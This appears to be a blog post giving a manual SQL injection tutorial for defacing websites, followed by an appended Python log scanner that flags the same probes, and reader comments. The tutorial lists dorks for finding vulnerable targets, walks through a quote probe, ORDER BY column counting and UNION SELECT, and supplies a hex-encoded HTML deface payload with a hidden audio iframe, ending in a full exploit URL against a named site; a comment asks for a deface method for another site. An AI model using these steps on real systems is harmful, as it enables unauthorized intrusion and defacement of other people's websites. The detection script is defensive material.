SQL INJECT
Assalamualaikum wr.wb
Okay, in this post I will give a tutorial on manual SQL injection using Android. This SQL injection does not go after the target website's username and password; it only places a name, a song and a photo.
Okay, straight to the tutorial.
Dorks:
- inurl:/detail_berita.php?id=
- inurl:/umum.php?id=
- inurl:/games.php?id=
- inurl:/about.php?id=
- inurl:/viewproduct.php?id=
Live target
1. First, search for targets using the dorks above.
2. Once we have a target, check whether it is vulnerable to SQL injection by appending ' after the number in the target URL, for example:
http://www.jjhobby.com/viewproduct.php?id=9'
If it is vulnerable, the page will look like this:
Roughly like that; the point is that a MySQL error or an SQL syntax error appears, something along those lines.
3. If the target web is vulnerable, continue by entering the exploit, which is:
Append +order+by+1--
then +order+by+2--, +order+by+3--, +order+by+4--
and so on
until you hit an error.
I got the error at 11, which means there are 10 columns.
4. Once we know the column count, enter the next exploit, which is:
+union+select+1,2,3,4,5,6,7,8,9,10--
The numbers at the end match the column count; don't forget to add - in front of the id number, e.g. id=9 becomes id=-9.
And the result:
The one I circled is the magic number.
5. I picked number 2; next we inject the number/web.
First visit this web to hex-encode your HTML code: here
For example, this is your HTML code:
<center><img class="rotate" src="https://4.top4top.net/p_129460x4i0.jpg" height="400px" width="400px"><br>INJECTED BY PcT•Mr.Pemula & My Teacher MR.CRUNCH<br><iframe width="0" height="0" src="https://5.top4top.net/m_13214tzi60.mp3" frameborder="0" allowfullscreen></iframe> <style type="text/css"> .rotate { animation-name: rotate ; animation-duration: 5s; animation-play-state: running; animation-timing-function: linear; animation-iteration-count: infinite; opacity: 1.0;filter: alpha(opacity=50); } img:hover { opacity: 1.0; filter: alpha(opacity=100); } @keyframes rotate{ 10% {transform:rotateY(36deg)} 20% {transform:rotateY(72deg)} 30% {transform:rotateY(108deg)} 40% {transform:rotateY(144deg)} 50% {transform:rotateY(180deg)} 60% {transform:rotateY(216deg)} 70% {transform:rotateY(252deg)} 80% {transform:rotateY(288deg)} 90% {transform:rotateY(324deg)} 100% {transform:rotateY(360deg)} } </style>
Then copy your code and paste it into the web above, like this:
Then click the button.
That is the result.
6. After that, enter the injection code:
+union+select+1,CONCAT(0xHASILHEXYGTADI),3,4,5,6,7,8,9,10--
The CONCAT goes in the column that matches your magic number from before. The 0x must be kept; don't delete it.
Here is my result: here
And this is the final link:
http://www.jjhobby.com/viewproduct.php?id=-9+union+select+1,CONCAT(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),3,4,5,6,7,8,9,10--
And the injection result:
Okay, that's all from me for now; if you have questions you can comment below or contact me.
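A defender-side counterpart, added here and not part of the original post: a Python scanner that reads web-server access-log lines and flags, on a numeric id parameter, the exact probe sequence walked through above: the appended quote, the ORDER BY column enumeration, and the negative id with UNION SELECT and a 0x hex literal. The log lines, IP addresses and path are constructed samples, not real traffic.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log sample (hypothetical IPs/path), one line per tutorial step.
# The quote probe is stored percent-encoded (%27), as a browser would send it.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /viewproduct.php?id=9 HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /viewproduct.php?id=9%27 HTTP/1.1" 200 812
203.0.113.5 - - [01/Jan/2024:10:00:20 +0000] "GET /viewproduct.php?id=9+order+by+11-- HTTP/1.1" 200 812
203.0.113.5 - - [01/Jan/2024:10:01:00 +0000] "GET /viewproduct.php?id=-9+union+select+1,CONCAT(0x3c63656e7465723e),3,4,5,6,7,8,9,10-- HTTP/1.1" 200 7000
198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /viewproduct.php?id=12 HTTP/1.1" 200 5100
"""

# Common Log Format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)

# Patterns checked against the URL-decoded value of the id parameter.
PATTERNS = [
    ("quote_probe", re.compile(r"^\d+'")),                  # id=9'
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),  # order by N--
    ("union_select", re.compile(r"\bunion\s+select\b", re.I)),   # union select 1,2,...
    ("hex_literal", re.compile(r"\b0x[0-9a-f]+\b", re.I)),      # CONCAT(0x...)
]


def classify_id(value: str) -> list[str]:
    """Return the names of injection patterns present in one decoded id value."""
    if re.fullmatch(r"\d+", value):  # a plain integer is the only legitimate shape
        return []
    return [name for name, rx in PATTERNS if rx.search(value)]


def scan_log(text: str) -> list[dict]:
    """Parse each log line, decode the id parameter, and report suspicious values."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs already percent-decodes and turns '+' into spaces.
        params = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
        for value in params.get("id", []):
            tags = classify_id(value)
            if tags:
                findings.append({"ip": m["ip"], "ts": m["ts"], "id": value, "tags": tags})
    return findings
```

Run against real logs, the useful alert is the progression from one source: quote probe, then ORDER BY enumeration, then UNION SELECT, which is the fingerprint of the manual method shown in this post.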

2 Responses to "SQL INJECT"
Next request: the lokopedia deface method😚
Great information. Thank you so much for sharing it with us. You can try this. xor decoder